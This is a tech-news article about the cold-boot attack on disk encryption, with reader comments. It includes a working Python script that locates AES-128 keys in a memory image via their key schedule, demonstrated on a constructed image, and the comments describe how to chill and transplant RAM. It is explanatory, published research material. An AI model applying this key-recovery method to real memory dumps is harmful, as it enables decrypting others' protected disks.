Researchers Crack Encryption with Cold

Exploiting a little-known property of DRAM, researchers have devised a way to defeat full-disk encryption.

The attack takes only a few minutes to carry out and relies on the disk encryption key, which must be held in the computer's RAM for as long as an encrypted volume is mounted.

The attack works because the contents of DRAM, encryption keys included, do not vanish the instant power is removed: they fade over a period of seconds to minutes, and far more slowly if the memory modules are chilled. An attacker with brief physical access to a running or suspended machine can cut the power, reboot it (or move the modules into another machine) into a small program that dumps memory, locate the key in the resulting image, and then use that key to decrypt the disk.

"We've broken disk encryption products in exactly the case when they seem to be most important these days: laptops that contain sensitive corporate data or personal information about business customers," said J. Alex Halderman, one of the researchers, in a press release. "Unlike many security problems, this isn't a minor flaw; it is a fundamental limitation in the way these systems were designed."

Successful attacks were demonstrated against Windows Vista's BitLocker, Apple's FileVault, TrueCrypt, and Linux's dm-crypt.
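The last step, finding the key inside a memory dump, is the part the article leaves out. The researchers' method for AES is to look for the key schedule: an in-use AES key sits in RAM next to its expanded round keys, so every 16-byte window of the image can be treated as a candidate key, expanded, and compared against the 160 bytes that follow it, allowing a few bit flips for decay. The script below is an added example written for this page, not the researchers' tool or code from the paper; the memory image it scans is constructed in the script (random bytes with one key schedule planted and three bits flipped), and the thresholds and offsets are illustrative choices.

```python
"""Scan a memory image for AES-128 keys by searching for their key schedule.

Every 16-byte window is treated as a candidate key, expanded with the
FIPS-197 key schedule, and compared against the 160 bytes that follow it.
A near match, tolerating a few flipped bits from DRAM decay, is reported.
The image scanned below is constructed for the example; no real memory
is read.
"""
import random


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _build_sbox():
    # Generate the AES S-box from its definition (multiplicative inverse in
    # GF(2^8) followed by the affine map) instead of typing the 256-entry table.
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF  # p *= 3
        q = (q ^ (q << 1)) & 0xFF                               # q /= 3
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        # here q == p^-1; apply the affine transformation
        sbox[p] = (q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4)) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key: bytes) -> bytes:
    """FIPS-197 key expansion for AES-128: 16-byte key -> 176-byte schedule."""
    assert len(key) == 16
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = t[1:] + t[:1]             # RotWord
            t = [SBOX[b] for b in t]      # SubWord
            t[0] ^= RCON[i // 4 - 1]
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return bytes(b for word in w for b in word)


def bit_errors(a: bytes, b: bytes) -> int:
    """Hamming distance between two equal-length byte strings."""
    return bin(int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).count("1")


def find_aes128_keys(image: bytes, max_bit_errors: int = 8):
    """Return (offset, key, bit_errors) for every window whose expanded
    schedule matches the following 160 bytes within max_bit_errors."""
    hits = []
    for off in range(len(image) - 176 + 1):
        cand = bytes(image[off:off + 16])
        errs = bit_errors(expand_key(cand)[16:], image[off + 16:off + 176])
        if errs <= max_bit_errors:
            hits.append((off, cand, errs))
    return hits


def build_sample_image(key: bytes, at: int = 4096, size: int = 16384, seed: int = 1) -> bytearray:
    """Constructed stand-in for a RAM dump: seeded noise with one key schedule
    planted at `at`, then three bits flipped in the round keys to mimic decay."""
    rng = random.Random(seed)
    image = bytearray(rng.getrandbits(8) for _ in range(size))
    image[at:at + 176] = expand_key(key)
    for pos, bit in ((20, 0), (77, 5), (150, 7)):  # decay hits the round keys, not the key itself
        image[at + pos] ^= 1 << bit
    return image


if __name__ == "__main__":
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # FIPS-197 test key
    for off, k, errs in find_aes128_keys(build_sample_image(key)):
        print(f"AES-128 key at 0x{off:x}: {k.hex()} ({errs} decayed bits in schedule)")
```

The redundancy of the schedule is what makes this robust: 160 bytes of round keys are derived from 16 bytes of key, so a handful of flipped bits still leaves an unmistakable match, and a threshold of a few bits in 1280 cannot be reached by chance in random data. The example assumes the 16 key bytes themselves survived; the paper goes further and reconstructs the key from a decayed schedule, which this script does not attempt. Run it as-is to see the planted key found at offset 0x1000 with three decayed bits.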

Via:  Wired News
Tags:  Encryption, Search, Research, Crack
mazuki 6 years ago
I was unaware that RAM stored information after being powered off. When did it become non-volatile?

So really it depends on the type of RAM you have, how hot it runs, and the program you use, the safest being TrueCrypt and dm-crypt of course, depending on what you encrypt with them.

And Apple's FileVault is less than secure in the first place, not really a challenge for that one. But the rest I'm surprised to see.
werty316 6 years ago

/scratches head.

I wonder how that works, as the last time I checked RAM is volatile memory, so this confuses me.

recoveringknowitall 6 years ago

[quote user="werty316"]I wonder how that works, as the last time I checked RAM is volatile memory, so this confuses me.[/quote]

Although my understanding of this matter is limited, I do understand the principle of volatile memory, so I'm confused too.


jtm55 6 years ago

Hi All,

Beats me.

^Bad_Boy^ 6 years ago
Maybe they meant ROM :)
mazuki 6 years ago
After watching the video (click the link at the top), they explain that while the memory information IS lost when power is gone, it's not instant; it works like a capacitor, slowly losing information in a predictable manner.

Their method is to remove the RAM chip (one in a laptop), cool it with an upside-down compressed-air can, plug it into another machine, and then boot to their eHDD with software on it that dumps the RAM, then run software that searches for and extracts the key.

This method works far better on system-volume encryption than it does on container encryption, i.e. not entire volumes, where you manually mount the object (TrueCrypt), because after unmounting, if you were to use your RAM heavily, it would overwrite it and clear it out.

Page files come into the equation, and it's better not to use them, or to clean them out on power-down. Same with your swap in Linux.
Savage Animal 6 years ago

So really it's a joke. You need to actually remove the RAM from the encrypted machine, freeze it, then install it in a new machine and run a dump program to retrieve the info wanted. If the info is so confidential that it needs to be encrypted, the machine is not going to leave the user's person to allow the RAM to be removed, so what good does that do?
